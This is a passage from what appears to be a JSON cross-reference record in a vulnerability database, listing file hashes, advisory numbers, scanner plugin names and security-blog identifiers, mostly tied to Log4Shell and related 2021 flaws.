"CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D1B56895A302CB106810B80548010A8993C467A6D8B6EA61EB430703400A5ED8", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D406490E70A52CFB0315F27FCD957BFAE7E7B2887A6C73BE83E3F514F1153348", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "D9D956C60F66CFAE1D9189841B4A3D7D9E24B0A79B088C79120CBB100E34A220", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DD0EE895B8C1D023C4A9C7DA2726D4CAC8D1495A05DF9FE91915F58FF012245D", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DEAB63B690E03D8E8203ACA19836C2D36A8ED9D5C66A32CCF4F7F6B6C9F8DE84", "DF1F3615A0C3950BF1BCF7F7E12370C0F3A7DBD2E12D656DC66F966233BD6A40", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2AA9B11D88890FE4ED3C245CC3A519ACAAD11F11F032D2AE032FE428B8C4012", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E3F560319C0EA06228FA2D0D5412CFFD95B8D0963A65CBAC4B6D424BA4B7B434", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4DC5C75AB8DC1EFE3474E65C33B8EED76C2B358258DE3E2C7A0C0EA9FD53126", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E805A2E822F9F587AC809C6A8CA399694FA0BD883078F64EF001D4B79132B879", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "E8BA6A75873A4594BE92FFE48C361848E9581DAA153EABDC1D071E1A59172338", "EA3F9619545419A098A554C6AA49233D406E118A8A2221EEFF0BABB483AAC02B", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EE31BACFE4E2531B3AC2273027A23C49C59978284694658A79B4BC6797F86ACB", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F02EA1DD204629897DA1861F147A272B72A3FA34A5315D58B896A636EAE341F5", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F203AF8FB4A9FED8F009C8BF5E3F7D7714130DCBC84CDBF1BE1C83E438B18982", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F35EB0C55F08CA4C671A4E6D2454A08936C6D1CD868709D0EE04FB71FFC263C1", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F532C527613357C6A2A49FB79425351FAA7200585028A4FA9898C13802895FB6", "F7232359E6413A274B62C22CB7BF1EF8C428ADFBF22EF7B9B913D63D087BCACB", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FB294BF49176D6C142EF1CFE519D56E0B6967174C95D88BDD800F026AD0FBE3B", "FBA658AB7258D6E577137D42B1A2D234254671E3792A2242E92F22B44483BD23", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FCA762BB9E14A08E1A746C9884B2B094D081A955F4AED9FE69DA524978C45CE9", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12224", "KLA12390", "KLA12391", "KLA12392", "KLA12393", "KLA12394", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2021-0572", "MGASA-2022-0002"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-34473", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2021-1733.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_2_17_0.NASL", "APACHE_LOG4J_2_17_0_MAC.NASL", "APACHE_LOG4J_2_17_1.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2852.NASL", "DEBIAN_DLA-2870.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_PROXYSHELL.NBIN", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_D1BE3D73673711EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1605.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2021-4118.NASL", "OPENSUSE-2021-4208.NASL", "OPENSUSE-2022-0002-1.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_ENTERPRISE_MANAGER_CPU_APR_2022.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_CPU_APR_2022.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_APR_2022.NASL", "ORACLE_JDEVELOPER_CPU_APR_2022.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_SITES_CPU_APR_2022.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "REDHAT-RHSA-2022-1462.NASL", "REDHAT-RHSA-2022-1463.NASL", "SERVU_15_3.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5203-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DLA-2852-1", "OSV:DLA-2870-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:DSA-5024-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-P6XC-XR62-6R2G", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167449", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:9F3C0081D4135E83F44053063F0E78EE", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0026", "RHSA-2022:0042", "RHSA-2022:0043", "RHSA-2022:0044", "RHSA-2022:0047", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0138", "RHSA-2022:0181", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0219", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0225", "RHSA-2022:0226", "RHSA-2022:0227", "RHSA-2022:0230", "RHSA-2022:0236", "RHSA-2022:0296", "RHSA-2022:0431", "RHSA-2022:0467", "RHSA-2022:0485", "RHSA-2022:0493", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299", "RHSA-2022:1462", "RHSA-2022:1463", "RHSA-2022:1469"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1605-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4118-1", "OPENSUSE-SU-2021:4208-1", "OPENSUSE-SU-2022:0002-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:362401076AC227D49D729838DBDC2052", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:933FE23273AB5250B949633A337D44E1", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", 